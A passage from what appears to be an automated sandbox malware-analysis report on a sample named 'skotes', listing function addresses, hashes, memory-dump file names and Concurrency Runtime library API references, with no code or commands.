                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 03b391406aee22687d9aeca38b762777dd17c8bdc7ea1fb1d544985612a8361a
                                                                                                                                                                                                                                          • Instruction ID: 4b8383fd690f6e2ff092cdda441258caae390afb57f5a7e4bcc19d78827bc775
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 03b391406aee22687d9aeca38b762777dd17c8bdc7ea1fb1d544985612a8361a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0DF081EF18C2107EA157D18A2B4CAF6AA6FB9D73703708476F482D1503E2C84B0D6131
                                                                                                                                                                                                                                          Function 051A0362 Relevance: .1, Instructions: 64COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.7290992998.00000000051A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051A0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_51a0000_skotes.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: fb28cf0b78fdf272b1c7301786ac8ac581febcc2aaf70e3ed1d54fc3e75f1aed
                                                                                                                                                                                                                                          • Instruction ID: 0cbd1802a92be37d969acd76fe7563949288b0600a2a4f755f02c79a498dbf4b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fb28cf0b78fdf272b1c7301786ac8ac581febcc2aaf70e3ed1d54fc3e75f1aed
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B9F08CEF1881106EA167D18A2B4CAB6AA6FB9DB3303718476F042D1502E3C88B4E6031
                                                                                                                                                                                                                                          Function 051A037E Relevance: .0, Instructions: 49COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.7290992998.00000000051A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051A0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_51a0000_skotes.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 7e68fc19c9b2a2b2a8e4e6ce7492a46f75c39b686cd0647d2d34d5810f78efba
                                                                                                                                                                                                                                          • Instruction ID: d9b6c55e43758762e49c842f1fb02cdf273bc2168ccd8f020ac3aade49f90e8a
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7e68fc19c9b2a2b2a8e4e6ce7492a46f75c39b686cd0647d2d34d5810f78efba
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B9F01CAF1886106EA156D1862B1CAF5AAAFF5D73303B1853AF482D1502E2D84F5D6131

                                                                                                                                                                                                                                          Non-executed Functions

                                                                                                                                                                                                                                          Function 006B0E13 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 284COMMONLIBRARYCODE
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 006B0F16
                                                                                                                                                                                                                                          • Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 006B0F62
                                                                                                                                                                                                                                            • Part of subcall function 006B265D: Concurrency::details::GlobalCore::Initialize.LIBCONCRT ref: 006B2750
                                                                                                                                                                                                                                          • Concurrency::details::ResourceManager::AffinityRestriction::FindGroupAffinity.LIBCONCRT ref: 006B0FCE
                                                                                                                                                                                                                                          • Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 006B0FEA
                                                                                                                                                                                                                                          • Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 006B103E
                                                                                                                                                                                                                                          • Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 006B106B
                                                                                                                                                                                                                                          • Concurrency::details::ResourceManager::CleanupTopologyInformation.LIBCMT ref: 006B10C1
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.7275648216.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275433344.0000000000690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275648216.00000000006F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275968302.00000000006F9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276147985.00000000006FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276304811.0000000000707000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276928573.0000000000861000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277058209.0000000000863000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277328542.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277424160.000000000087E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277572625.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277572625.0000000000889000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277864045.000000000088D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277942912.000000000088E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278102362.0000000000891000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278214114.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278285092.000000000089B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278377632.00000000008A2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278550742.00000000008B4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278710256.00000000008B5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278829889.00000000008B6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278929467.00000000008B7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279039474.00000000008C3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279168151.00000000008CD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279334863.00000000008E9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279407574.00000000008F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279518624.00000000008FF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279661164.0000000000902000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279854603.0000000000903000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279993030.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280108048.000000000090E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280247867.000000000090F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280355990.0000000000910000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280427090.0000000000913000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280599351.000000000091A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280847963.000000000091F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280967937.0000000000920000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281087872.0000000000922000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281231155.0000000000923000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281368048.000000000092B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281535264.0000000000942000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281656926.0000000000944000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281741289.000000000094D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000094E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000096B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282158490.0000000000999000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282279815.000000000099A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282398679.000000000099F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282502972.00000000009A1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282600354.00000000009AE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282654461.00000000009B0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_690000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Concurrency::details::$GlobalInitialize$Node::$AffinityManager::Resource$CleanupCore::FindGroupInformationRestriction::Topology
                                                                                                                                                                                                                                          • String ID: (
                                                                                                                                                                                                                                          • API String ID: 2943730970-3887548279
                                                                                                                                                                                                                                          • Opcode ID: eea3053fcd5dc65a5d5d283ba0891f83629c7468b9757b9bd35fd8cbd170a0df
                                                                                                                                                                                                                                          • Instruction ID: 50a979f11f0413a4db4c40a8ff6cb0cb438c61f082b3eb4f38be66b4db2aa4dc
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: eea3053fcd5dc65a5d5d283ba0891f83629c7468b9757b9bd35fd8cbd170a0df
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AFB15DB0A00615EFDB28DF58D9A1ABABBB6FF45300F14416DE906AB351D730ED81CB94
                                                                                                                                                                                                                                          Function 006B1602 Relevance: 13.7, APIs: 9, Instructions: 213memoryCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 006B2CFC: Concurrency::details::ResourceManager::InitializeRMBuffers.LIBCMT ref: 006B2D0F
                                                                                                                                                                                                                                          • Concurrency::details::ResourceManager::PreProcessDynamicAllocationData.LIBCONCRT ref: 006B1614
                                                                                                                                                                                                                                            • Part of subcall function 006B2E0F: Concurrency::details::ResourceManager::HandleBorrowedCores.LIBCONCRT ref: 006B2E39
                                                                                                                                                                                                                                            • Part of subcall function 006B2E0F: Concurrency::details::ResourceManager::HandleSharedCores.LIBCONCRT ref: 006B2EA8
                                                                                                                                                                                                                                          • Concurrency::details::ResourceManager::IncreaseFullyLoadedSchedulerAllocations.LIBCMT ref: 006B1746
                                                                                                                                                                                                                                          • Concurrency::details::ResourceManager::AdjustDynamicAllocation.LIBCONCRT ref: 006B17A6
                                                                                                                                                                                                                                          • Concurrency::details::ResourceManager::PrepareReceiversForCoreTransfer.LIBCMT ref: 006B17B2
                                                                                                                                                                                                                                          • Concurrency::details::ResourceManager::DistributeExclusiveCores.LIBCONCRT ref: 006B17ED
                                                                                                                                                                                                                                          • Concurrency::details::ResourceManager::AdjustDynamicAllocation.LIBCONCRT ref: 006B180E
                                                                                                                                                                                                                                          • Concurrency::details::ResourceManager::PrepareReceiversForCoreTransfer.LIBCMT ref: 006B181A
                                                                                                                                                                                                                                          • Concurrency::details::ResourceManager::DistributeIdleCores.LIBCONCRT ref: 006B1823
                                                                                                                                                                                                                                          • Concurrency::details::ResourceManager::ResetGlobalAllocationData.LIBCMT ref: 006B183B
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.7275648216.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275433344.0000000000690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275648216.00000000006F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275968302.00000000006F9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276147985.00000000006FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276304811.0000000000707000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276928573.0000000000861000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277058209.0000000000863000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277328542.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277424160.000000000087E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277572625.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277572625.0000000000889000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277864045.000000000088D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277942912.000000000088E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278102362.0000000000891000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278214114.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278285092.000000000089B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278377632.00000000008A2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278550742.00000000008B4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278710256.00000000008B5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278829889.00000000008B6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278929467.00000000008B7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279039474.00000000008C3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279168151.00000000008CD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279334863.00000000008E9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279407574.00000000008F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279518624.00000000008FF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279661164.0000000000902000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279854603.0000000000903000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279993030.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280108048.000000000090E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280247867.000000000090F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280355990.0000000000910000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280427090.0000000000913000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280599351.000000000091A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280847963.000000000091F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280967937.0000000000920000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281087872.0000000000922000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281231155.0000000000923000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281368048.000000000092B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281535264.0000000000942000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281656926.0000000000944000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281741289.000000000094D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000094E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000096B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282158490.0000000000999000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282279815.000000000099A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282398679.000000000099F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282502972.00000000009A1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282600354.00000000009AE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282654461.00000000009B0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_690000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Concurrency::details::Manager::Resource$AllocationCores$Dynamic$AdjustCoreDataDistributeHandlePrepareReceiversTransfer$AllocationsBorrowedBuffersExclusiveFullyGlobalIdleIncreaseInitializeLoadedProcessResetSchedulerShared
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2508902052-0
                                                                                                                                                                                                                                          • Opcode ID: aa9f8f36a8b7b44e1180d435f458fb72d8e9ffd861c0e8264618b64b20c70f21
                                                                                                                                                                                                                                          • Instruction ID: 25b749f851ad6ec8d6a2671d307a113e3cfd3b840da21c0434cb0e25a7957147
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: aa9f8f36a8b7b44e1180d435f458fb72d8e9ffd861c0e8264618b64b20c70f21
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B3816CB1E00225AFCB18CFA8C5A49ADB7F6FF49304B5546ADD445AB701DB30AD92CB84
                                                                                                                                                                                                                                          Function 006BEC48 Relevance: 6.1, APIs: 4, Instructions: 139COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 006BEC81
                                                                                                                                                                                                                                            • Part of subcall function 006B8F2F: Concurrency::details::ContextBase::ThrowContextEvent.LIBCONCRT ref: 006B8F50
                                                                                                                                                                                                                                          • Concurrency::details::SchedulerBase::GetInternalContext.LIBCONCRT ref: 006BECE7
                                                                                                                                                                                                                                          • Concurrency::details::WorkItem::ResolveToken.LIBCONCRT ref: 006BECFF
                                                                                                                                                                                                                                          • Concurrency::details::WorkItem::BindTo.LIBCONCRT ref: 006BED0C
                                                                                                                                                                                                                                            • Part of subcall function 006BE7AF: Concurrency::details::InternalContextBase::ReclaimVirtualProcessor.LIBCONCRT ref: 006BE7D7
                                                                                                                                                                                                                                            • Part of subcall function 006BE7AF: Concurrency::details::SchedulerBase::TriggerCommitSafePoints.LIBCMT ref: 006BE86F
                                                                                                                                                                                                                                            • Part of subcall function 006BE7AF: Concurrency::details::SchedulerBase::VirtualProcessorActive.LIBCONCRT ref: 006BE879
                                                                                                                                                                                                                                            • Part of subcall function 006BE7AF: Concurrency::location::_Assign.LIBCMT ref: 006BE8AD
                                                                                                                                                                                                                                            • Part of subcall function 006BE7AF: Concurrency::details::ScheduleGroupSegmentBase::AddRunnableContext.LIBCONCRT ref: 006BE8B5
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.7275648216.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275433344.0000000000690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275648216.00000000006F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275968302.00000000006F9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276147985.00000000006FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276304811.0000000000707000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276928573.0000000000861000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277058209.0000000000863000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277328542.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277424160.000000000087E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277572625.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277572625.0000000000889000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277864045.000000000088D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277942912.000000000088E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278102362.0000000000891000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278214114.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278285092.000000000089B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278377632.00000000008A2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278550742.00000000008B4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278710256.00000000008B5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278829889.00000000008B6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278929467.00000000008B7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279039474.00000000008C3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279168151.00000000008CD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279334863.00000000008E9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279407574.00000000008F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279518624.00000000008FF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279661164.0000000000902000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279854603.0000000000903000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279993030.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280108048.000000000090E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280247867.000000000090F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280355990.0000000000910000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280427090.0000000000913000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280599351.000000000091A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280847963.000000000091F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280967937.0000000000920000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281087872.0000000000922000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281231155.0000000000923000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281368048.000000000092B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281535264.0000000000942000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281656926.0000000000944000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281741289.000000000094D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000094E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000096B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282158490.0000000000999000.00000040.00000001.01000000.00000007.sdmpDownload File
